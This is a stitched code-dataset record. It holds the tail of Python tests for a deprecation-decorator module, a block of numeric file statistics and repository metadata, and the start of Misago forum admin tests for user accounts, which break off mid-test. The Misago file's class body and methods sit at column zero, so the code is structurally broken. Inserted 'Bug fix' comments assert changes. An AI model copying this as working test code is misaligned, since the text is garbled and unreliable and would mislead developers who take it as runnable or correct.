                               ("d2", "my_ok_val"))
  def _fn(arg0, d1=None, arg1=2, d2=None):
    return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1

  # Assert calls without the deprecated arguments log nothing.
  self.assertEqual(2, _fn(1, arg1=2))
  self.assertEqual(0, mock_warning.call_count)

  # Assert calls with the deprecated arguments log one warning each.
  self.assertEqual(2, _fn(1, False, 2, d2=False))
  self.assertEqual(2, mock_warning.call_count)
  (args1, _) = mock_warning.call_args_list[0]
  self.assertRegexpMatches(args1[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions, "d1"]), set(args1[1:]))
  (args2, _) = mock_warning.call_args_list[1]
  # Bug fix: the second warning's message was previously (and wrongly)
  # re-checked against args1; it must be checked against args2.
  self.assertRegexpMatches(args2[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions, "d2"]), set(args2[1:]))

  # Assert calls with the deprecated arguments don't log warnings if
  # the value matches the 'ok_val'.
  mock_warning.reset_mock()
  self.assertEqual(3, _fn(1, None, 2, d2="my_ok_val"))
  self.assertEqual(0, mock_warning.call_count)
class DeprecatedArgValuesTest(test.TestCase):
  """Tests for the deprecation.deprecated_arg_values decorator."""

  def _assert_subset(self, expected_subset, actual_set):
    # Helper: every expected element must appear among the warning args.
    self.assertTrue(
        actual_set.issuperset(expected_subset),
        msg="%s is not a superset of %s." % (actual_set, expected_subset))

  def test_deprecated_illegal_args(self):
    """Decorator factory validates date, instructions, and named values."""
    instructions = "This is how you update..."
    with self.assertRaisesRegexp(ValueError, "date"):
      deprecation.deprecated_arg_values(None, instructions, deprecated=True)
    with self.assertRaisesRegexp(ValueError, "date"):
      deprecation.deprecated_arg_values("", instructions, deprecated=True)
    with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"):
      deprecation.deprecated_arg_values(
          "07-04-2016", instructions, deprecated=True)
    date = "2016-07-04"
    with self.assertRaisesRegexp(ValueError, "instructions"):
      deprecation.deprecated_arg_values(date, None, deprecated=True)
    with self.assertRaisesRegexp(ValueError, "instructions"):
      deprecation.deprecated_arg_values(date, "", deprecated=True)
    # Bug fix: "deprecated=True" was mistakenly passed to assertRaisesRegexp
    # instead of to the factory. The factory must be called with NO deprecated
    # argument values for the "argument" validation error to fire.
    with self.assertRaisesRegexp(ValueError, "argument"):
      deprecation.deprecated_arg_values(date, instructions)

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_static_fn_with_doc(self, mock_warning):
    """A multi-line docstring gets the deprecation notice spliced in."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    @deprecation.deprecated_arg_values(date, instructions, deprecated=True)
    def _fn(arg0, arg1, deprecated=True):
      """fn doc.

      Args:
        arg0: Arg 0.
        arg1: Arg 1.
        deprecated: Deprecated!

      Returns:
        Sum of args.
      """
      return arg0 + arg1 if deprecated else arg1 + arg0

    # Assert function docs are properly updated.
    self.assertEqual("_fn", _fn.__name__)
    self.assertEqual(
        "fn doc. (deprecated arguments)"
        "\n"
        "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
        "\nInstructions for updating:\n%s"
        "\n"
        "\nArgs:"
        "\n  arg0: Arg 0."
        "\n  arg1: Arg 1."
        "\n  deprecated: Deprecated!"
        "\n"
        "\nReturns:"
        "\n  Sum of args." % (date, instructions), _fn.__doc__)

    # Assert calling new fn with non-deprecated value logs nothing.
    self.assertEqual(3, _fn(1, 2, deprecated=False))
    self.assertEqual(0, mock_warning.call_count)

    # Assert calling new fn with deprecated value issues log warning.
    self.assertEqual(3, _fn(1, 2, deprecated=True))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

    # Assert calling new fn with default deprecated value issues log warning.
    self.assertEqual(3, _fn(1, 2))
    self.assertEqual(2, mock_warning.call_count)

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_static_fn_with_one_line_doc(self, mock_warning):
    """A one-line docstring gets the deprecation notice appended."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    @deprecation.deprecated_arg_values(date, instructions, deprecated=True)
    def _fn(arg0, arg1, deprecated=True):
      """fn doc."""
      return arg0 + arg1 if deprecated else arg1 + arg0

    # Assert function docs are properly updated.
    self.assertEqual("_fn", _fn.__name__)
    self.assertEqual(
        "fn doc. (deprecated arguments)"
        "\n"
        "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
        "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__)

    # Assert calling new fn with non-deprecated value logs nothing.
    self.assertEqual(3, _fn(1, 2, deprecated=False))
    self.assertEqual(0, mock_warning.call_count)

    # Assert calling new fn with deprecated value issues log warning.
    self.assertEqual(3, _fn(1, 2, deprecated=True))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

    # Assert calling new fn with default deprecated value issues log warning.
    self.assertEqual(3, _fn(1, 2))
    self.assertEqual(2, mock_warning.call_count)

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_static_fn_no_doc(self, mock_warning):
    """A missing docstring is replaced with a generated deprecation one."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    @deprecation.deprecated_arg_values(date, instructions, deprecated=True)
    def _fn(arg0, arg1, deprecated=True):
      return arg0 + arg1 if deprecated else arg1 + arg0

    # Assert function docs are properly updated.
    self.assertEqual("_fn", _fn.__name__)
    self.assertEqual(
        "DEPRECATED FUNCTION ARGUMENTS"
        "\n"
        "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
        "\nInstructions for updating:"
        "\n%s" % (date, instructions), _fn.__doc__)

    # Assert calling new fn with non-deprecated value logs nothing.
    self.assertEqual(3, _fn(1, 2, deprecated=False))
    self.assertEqual(0, mock_warning.call_count)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _fn(1, 2, deprecated=True))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

    # Assert calling new fn with default deprecated value issues log warning.
    self.assertEqual(3, _fn(1, 2))
    self.assertEqual(2, mock_warning.call_count)
class DeprecationArgumentsTest(test.TestCase):
  """Tests for deprecated_argument_lookup and rewrite_argument_docstring."""

  def testDeprecatedArgumentLookup(self):
    good_value = 3
    # Only the new name set: its value is returned.
    self.assertEqual(
        deprecation.deprecated_argument_lookup("val_new", good_value,
                                               "val_old", None),
        good_value)
    # Only the old name set: its value is returned.
    self.assertEqual(
        deprecation.deprecated_argument_lookup("val_new", None,
                                               "val_old", good_value),
        good_value)
    # Both names set: error (the call raises before any assertion runs).
    with self.assertRaisesRegexp(
        ValueError, "Cannot specify both 'val_old' and 'val_new'"):
      deprecation.deprecated_argument_lookup("val_new", good_value,
                                             "val_old", good_value)

  def testRewriteArgumentDocstring(self):
    docs = """Add `a` and `b`

    Args:
      a: first arg
      b: second arg
    """
    # Chain two rewrites: `a` -> `left`, then `b` -> `right`.
    rewritten = deprecation.rewrite_argument_docstring(
        deprecation.rewrite_argument_docstring(docs, "a", "left"), "b", "right")
    expected = """Add `left` and `right`

    Args:
      left: first arg
      right: second arg
    """
    self.assertEqual(rewritten, expected)
# Standard test entry point: run all test cases in this module.
if __name__ == "__main__":
  test.main()
| 36.792402
| 80
| 0.668019
| 3,415
| 27,116
| 5.126208
| 0.067643
| 0.077973
| 0.044556
| 0.034959
| 0.904147
| 0.882897
| 0.868902
| 0.860391
| 0.844682
| 0.822746
| 0
| 0.025418
| 0.210724
| 27,116
| 736
| 81
| 36.842391
| 0.792543
| 0.133021
| 0
| 0.813121
| 0
| 0
| 0.194456
| 0.001035
| 0
| 0
| 0
| 0
| 0.312127
| 1
| 0.107356
| false
| 0.011928
| 0.011928
| 0.021869
| 0.178926
| 0.001988
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07d7204f148c04bde45cf641df72864e42775d0b
| 27,760
|
py
|
Python
|
misago/users/tests/test_useradmin_views.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | 1
|
2017-07-25T03:04:36.000Z
|
2017-07-25T03:04:36.000Z
|
misago/users/tests/test_useradmin_views.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
misago/users/tests/test_useradmin_views.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.core import mail
from django.urls import reverse
from django.utils import six
from misago.acl.models import Role
from misago.admin.testutils import AdminTestCase
from misago.categories.models import Category
from misago.threads.testutils import post_thread, reply_thread
from misago.users.models import Ban, Rank
UserModel = get_user_model()
class UserAdminViewsTests(AdminTestCase):
AJAX_HEADER = {'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'}
def test_link_registered(self):
    """admin index view contains users link"""
    admin_index = self.client.get(reverse('misago:admin:index'))
    self.assertContains(
        admin_index, reverse('misago:admin:users:accounts:index'))
def test_list_view(self):
    """users list view returns 200"""
    # The index url first redirects to its canonical, query-carrying url.
    redirect = self.client.get(reverse('misago:admin:users:accounts:index'))
    self.assertEqual(redirect.status_code, 302)

    final_response = self.client.get(redirect['location'])
    self.assertEqual(final_response.status_code, 200)
    self.assertContains(final_response, self.user.username)
def test_list_search(self):
    """users list is searchable"""
    response = self.client.get(reverse('misago:admin:users:accounts:index'))
    self.assertEqual(response.status_code, 302)
    # The redirect target carries the base query string that search
    # parameters are appended to below.
    link_base = response['location']
    response = self.client.get(link_base)
    self.assertEqual(response.status_code, 200)

    user_a = UserModel.objects.create_user('Tyrael', 't123@test.com', 'pass123')
    user_b = UserModel.objects.create_user('Tyrion', 't321@test.com', 'pass123')
    user_c = UserModel.objects.create_user('Karen', 't432@test.com', 'pass123')

    # Search both
    response = self.client.get('%s&username=tyr' % link_base)
    self.assertEqual(response.status_code, 200)
    self.assertContains(response, user_a.username)
    self.assertContains(response, user_b.username)

    # Search tyrion
    response = self.client.get('%s&username=tyrion' % link_base)
    self.assertEqual(response.status_code, 200)
    self.assertNotContains(response, user_a.username)
    self.assertContains(response, user_b.username)

    # Search tyrael
    response = self.client.get('%s&email=t123@test.com' % link_base)
    self.assertEqual(response.status_code, 200)
    self.assertContains(response, user_a.username)
    self.assertNotContains(response, user_b.username)

    # Search disabled
    user_c.is_active = False
    user_c.save()

    response = self.client.get('%s&disabled=1' % link_base)
    self.assertEqual(response.status_code, 200)
    self.assertNotContains(response, user_a.username)
    self.assertNotContains(response, user_b.username)
    # Disabled accounts are rendered struck-through on the list.
    self.assertContains(response, '<del>%s</del>' % user_c.username)
def test_mass_activation(self):
    """users list activates multiple users"""
    # Ten accounts awaiting admin activation.
    user_pks = [
        UserModel.objects.create_user(
            'Bob%s' % i,
            'bob%s@test.com' % i,
            'pass123',
            requires_activation=1,
        ).pk
        for i in range(10)
    ]

    response = self.client.post(
        reverse('misago:admin:users:accounts:index'),
        data={
            'action': 'activate',
            'selected_items': user_pks,
        }
    )
    self.assertEqual(response.status_code, 302)

    # No selected account should still require activation...
    inactive_qs = UserModel.objects.filter(
        id__in=user_pks,
        requires_activation=1,
    )
    self.assertEqual(inactive_qs.count(), 0)
    # ...and an activation e-mail should have been sent.
    self.assertIn("has been activated", mail.outbox[0].subject)
def test_mass_ban(self):
    """users list bans multiple users"""
    user_pks = [
        UserModel.objects.create_user(
            'Bob%s' % i,
            'bob%s@test.com' % i,
            'pass123',
            requires_activation=1,
        ).pk
        for i in range(10)
    ]

    # Without ban_type/finalize the view re-renders (200) instead of acting.
    response = self.client.post(
        reverse('misago:admin:users:accounts:index'),
        data={
            'action': 'ban',
            'selected_items': user_pks,
        }
    )
    self.assertEqual(response.status_code, 200)

    # Posting the chosen ban types with "finalize" performs the action (302).
    response = self.client.post(
        reverse('misago:admin:users:accounts:index'),
        data={
            'action': 'ban',
            'selected_items': user_pks,
            'ban_type': ['usernames', 'emails', 'domains', 'ip', 'ip_first', 'ip_two'],
            'finalize': '',
        },
    )
    self.assertEqual(response.status_code, 302)
    self.assertEqual(Ban.objects.count(), 24)
def test_mass_delete_accounts(self):
    """users list deletes users"""
    user_pks = [
        UserModel.objects.create_user(
            'Bob%s' % i,
            'bob%s@test.com' % i,
            'pass123',
            requires_activation=1,
        ).pk
        for i in range(10)
    ]

    response = self.client.post(
        reverse('misago:admin:users:accounts:index'),
        data={
            'action': 'delete_accounts',
            'selected_items': user_pks,
        }
    )
    self.assertEqual(response.status_code, 302)
    # Only the admin account performing the action should remain.
    self.assertEqual(UserModel.objects.count(), 1)
def test_mass_delete_all(self):
    """users list deletes users and their content"""
    user_pks = []
    for i in range(10):
        test_user = UserModel.objects.create_user(
            'Bob%s' % i,
            'bob%s@test.com' % i,
            'pass123',
            requires_activation=1,
        )
        user_pks.append(test_user.pk)

    response = self.client.post(
        reverse('misago:admin:users:accounts:index'),
        data={
            # Bug fix: this test previously posted 'delete_accounts',
            # duplicating test_mass_delete_accounts. Per the docstring it
            # must exercise the delete-with-content action instead.
            'action': 'delete_all',
            'selected_items': user_pks,
        }
    )
    self.assertEqual(response.status_code, 302)
    # Only the admin account performing the action should remain.
    self.assertEqual(UserModel.objects.count(), 1)
def test_new_view(self):
    """new user view creates account"""
    response = self.client.get(reverse('misago:admin:users:accounts:new'))
    self.assertEqual(response.status_code, 200)

    default_rank = Rank.objects.get_default()
    authenticated_role = Role.objects.get(special_role='authenticated')

    response = self.client.post(
        reverse('misago:admin:users:accounts:new'),
        data={
            'username': 'Bawww',
            'rank': six.text_type(default_rank.pk),
            'roles': six.text_type(authenticated_role.pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'staff_level': '0',
        }
    )
    self.assertEqual(response.status_code, 302)

    # New account is retrievable by username and by e-mail, and the
    # submitted password was set.
    UserModel.objects.get_by_username('Bawww')

    test_user = UserModel.objects.get_by_email('reg@stered.com')
    self.assertTrue(test_user.check_password('pass123'))
def test_new_view_password_with_whitespaces(self):
    """new user view creates account with whitespaces password"""
    response = self.client.get(reverse('misago:admin:users:accounts:new'))
    self.assertEqual(response.status_code, 200)

    default_rank = Rank.objects.get_default()
    authenticated_role = Role.objects.get(special_role='authenticated')

    response = self.client.post(
        reverse('misago:admin:users:accounts:new'),
        data={
            'username': 'Bawww',
            'rank': six.text_type(default_rank.pk),
            'roles': six.text_type(authenticated_role.pk),
            'email': 'reg@stered.com',
            # Leading/trailing spaces are intentional: the form must not
            # strip them from the password.
            'new_password': ' pass123 ',
            'staff_level': '0',
        }
    )
    self.assertEqual(response.status_code, 302)

    UserModel.objects.get_by_username('Bawww')

    # Password must verify with the whitespace preserved.
    test_user = UserModel.objects.get_by_email('reg@stered.com')
    self.assertTrue(test_user.check_password(' pass123 '))
def test_edit_view(self):
    """edit user view changes account"""
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    response = self.client.get(test_link)
    self.assertEqual(response.status_code, 200)

    # Submit a full edit form changing username, e-mail and password.
    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'newpass123',
            'staff_level': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Username change must also update the slug and the lookups by
    # username/e-mail.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertTrue(updated_user.check_password('newpass123'))
    self.assertEqual(updated_user.username, 'Bawww')
    self.assertEqual(updated_user.slug, 'bawww')

    UserModel.objects.get_by_username('Bawww')
    UserModel.objects.get_by_email('reg@stered.com')
def test_edit_dont_change_username(self):
    """
    If username wasn't changed, don't touch user's username, slug or history

    This is regression test for issue #640
    """
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    response = self.client.get(test_link)
    self.assertEqual(response.status_code, 200)

    # Post the form with the username unchanged ('Bob').
    response = self.client.post(
        test_link,
        data={
            'username': 'Bob',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Username and slug unchanged, and no name-change history entry created.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertEqual(updated_user.username, 'Bob')
    self.assertEqual(updated_user.slug, 'bob')
    self.assertEqual(updated_user.namechanges.count(), 0)
def test_edit_change_password_whitespaces(self):
    """edit user view changes account password to include whitespaces"""
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    response = self.client.get(test_link)
    self.assertEqual(response.status_code, 200)

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            # Leading/trailing spaces are intentional: the form must not
            # strip them from the password.
            'new_password': ' newpass123 ',
            'staff_level': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Password must verify with the whitespace preserved.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertTrue(updated_user.check_password(' newpass123 '))
    self.assertEqual(updated_user.username, 'Bawww')
    self.assertEqual(updated_user.slug, 'bawww')

    UserModel.objects.get_by_username('Bawww')
    UserModel.objects.get_by_email('reg@stered.com')
def test_edit_make_admin(self):
    """edit user view allows super admin to make other user admin"""
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Superuser sees the staff/superuser fields on the form.
    response = self.client.get(test_link)
    self.assertContains(response, 'id="id_is_staff_1"')
    self.assertContains(response, 'id="id_is_superuser_1"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '1',
            'is_superuser': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Staff flag set, superuser flag untouched.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertTrue(updated_user.is_staff)
    self.assertFalse(updated_user.is_superuser)
def test_edit_make_superadmin_admin(self):
    """edit user view allows super admin to make other user super admin"""
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Superuser sees the staff/superuser fields on the form.
    response = self.client.get(test_link)
    self.assertContains(response, 'id="id_is_staff_1"')
    self.assertContains(response, 'id="id_is_superuser_1"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '0',
            'is_superuser': '1',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Superuser flag set independently of the staff flag.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertFalse(updated_user.is_staff)
    self.assertTrue(updated_user.is_superuser)
def test_edit_denote_superadmin(self):
    """edit user view allows super admin to demote other super admin"""
    # NOTE(review): method name says "denote" but the test demotes; the name
    # is kept for backwards compatibility with existing test runs.
    test_user = UserModel.objects.create_user(
        'Bob',
        'bob@test.com',
        'pass123',
        is_staff=True,
        is_superuser=True,
    )
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Superuser sees the staff/superuser fields on the form.
    response = self.client.get(test_link)
    self.assertContains(response, 'id="id_is_staff_1"')
    self.assertContains(response, 'id="id_is_superuser_1"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '0',
            'is_superuser': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Both privileged flags were removed.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertFalse(updated_user.is_staff)
    self.assertFalse(updated_user.is_superuser)
def test_edit_cant_make_admin(self):
    """edit user view forbids admins from making other admins"""
    # Acting admin is staff but NOT superuser.
    self.user.is_superuser = False
    self.user.save()

    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Non-superuser does not see the staff/superuser fields at all.
    response = self.client.get(test_link)
    self.assertNotContains(response, 'id="id_is_staff_1"')
    self.assertNotContains(response, 'id="id_is_superuser_1"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '1',
            'is_superuser': '1',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
        }
    )
    self.assertEqual(response.status_code, 302)

    # Posted privilege flags must be ignored server-side.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertFalse(updated_user.is_staff)
    self.assertFalse(updated_user.is_superuser)
def test_edit_disable_user(self):
    """edit user view allows admin to disable non admin"""
    # Acting admin is staff but NOT superuser.
    self.user.is_superuser = False
    self.user.save()

    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Admin sees the is_active controls for a non-admin target.
    response = self.client.get(test_link)
    self.assertContains(response, 'id="id_is_active_1"')
    self.assertContains(response, 'id="id_is_active_staff_message"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '0',
            'is_superuser': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
            'is_active': '0',
            'is_active_staff_message': "Disabled in test!"
        }
    )
    self.assertEqual(response.status_code, 302)

    # Account disabled and the staff note stored.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertFalse(updated_user.is_active)
    self.assertEqual(updated_user.is_active_staff_message, "Disabled in test!")
def test_edit_superuser_disable_admin(self):
    """edit user view allows superuser to disable staff user"""
    # Acting admin IS superuser; the target is staff.
    self.user.is_superuser = True
    self.user.save()

    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_user.is_staff = True
    test_user.save()

    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Superuser sees the is_active controls even for a staff target.
    response = self.client.get(test_link)
    self.assertContains(response, 'id="id_is_active_1"')
    self.assertContains(response, 'id="id_is_active_staff_message"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '1',
            'is_superuser': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
            'is_active': '0',
            'is_active_staff_message': "Disabled in test!"
        }
    )
    self.assertEqual(response.status_code, 302)

    # Staff account disabled and the staff note stored.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertFalse(updated_user.is_active)
    self.assertEqual(updated_user.is_active_staff_message, "Disabled in test!")
def test_edit_admin_cant_disable_admin(self):
    """edit user view disallows admin to disable admin"""
    # Acting admin is staff but NOT superuser; the target is staff too.
    self.user.is_superuser = False
    self.user.save()

    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_user.is_staff = True
    test_user.save()

    test_link = reverse(
        'misago:admin:users:accounts:edit', kwargs={
            'pk': test_user.pk,
        }
    )

    # Non-superuser does not see is_active controls for a staff target.
    response = self.client.get(test_link)
    self.assertNotContains(response, 'id="id_is_active_1"')
    self.assertNotContains(response, 'id="id_is_active_staff_message"')

    response = self.client.post(
        test_link,
        data={
            'username': 'Bawww',
            'rank': six.text_type(test_user.rank_id),
            'roles': six.text_type(test_user.roles.all()[0].pk),
            'email': 'reg@stered.com',
            'new_password': 'pass123',
            'is_staff': '1',
            'is_superuser': '0',
            'signature': 'Hello world!',
            'is_signature_locked': '1',
            'is_hiding_presence': '0',
            'limits_private_thread_invites_to': '0',
            'signature_lock_staff_message': 'Staff message',
            'signature_lock_user_message': 'User message',
            'subscribe_to_started_threads': '2',
            'subscribe_to_replied_threads': '2',
            'is_active': '0',
            'is_active_staff_message': "Disabled in test!"
        }
    )
    self.assertEqual(response.status_code, 302)

    # Posted is_active fields must be ignored server-side.
    updated_user = UserModel.objects.get(pk=test_user.pk)
    self.assertTrue(updated_user.is_active)
    self.assertFalse(updated_user.is_active_staff_message)
def test_delete_threads_view(self):
    """delete user threads view deletes threads"""
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:delete-threads', kwargs={
            'pk': test_user.pk,
        }
    )

    category = Category.objects.all_categories()[:1][0]
    # Idiom fix: a plain loop for side effects instead of building a
    # throwaway list with a comprehension.
    for _ in range(10):
        post_thread(category, poster=test_user)

    # First AJAX call deletes the user's 10 threads but is not yet complete.
    response = self.client.post(test_link, **self.AJAX_HEADER)
    self.assertEqual(response.status_code, 200)

    response_dict = response.json()
    self.assertEqual(response_dict['deleted_count'], 10)
    self.assertFalse(response_dict['is_completed'])

    # Second call finds nothing left and reports completion.
    response = self.client.post(test_link, **self.AJAX_HEADER)
    self.assertEqual(response.status_code, 200)

    response_dict = response.json()
    self.assertEqual(response_dict['deleted_count'], 0)
    self.assertTrue(response_dict['is_completed'])
def test_delete_posts_view(self):
    """delete user posts view deletes posts"""
    test_user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    test_link = reverse(
        'misago:admin:users:accounts:delete-posts', kwargs={
            'pk': test_user.pk,
        }
    )

    category = Category.objects.all_categories()[:1][0]
    thread = post_thread(category)
    # Idiom fix: a plain loop for side effects instead of building a
    # throwaway list with a comprehension.
    for _ in range(10):
        reply_thread(thread, poster=test_user)

    # First AJAX call deletes the user's 10 replies but is not yet complete.
    response = self.client.post(test_link, **self.AJAX_HEADER)
    self.assertEqual(response.status_code, 200)

    response_dict = response.json()
    self.assertEqual(response_dict['deleted_count'], 10)
    self.assertFalse(response_dict['is_completed'])

    # Second call finds nothing left and reports completion.
    response = self.client.post(test_link, **self.AJAX_HEADER)
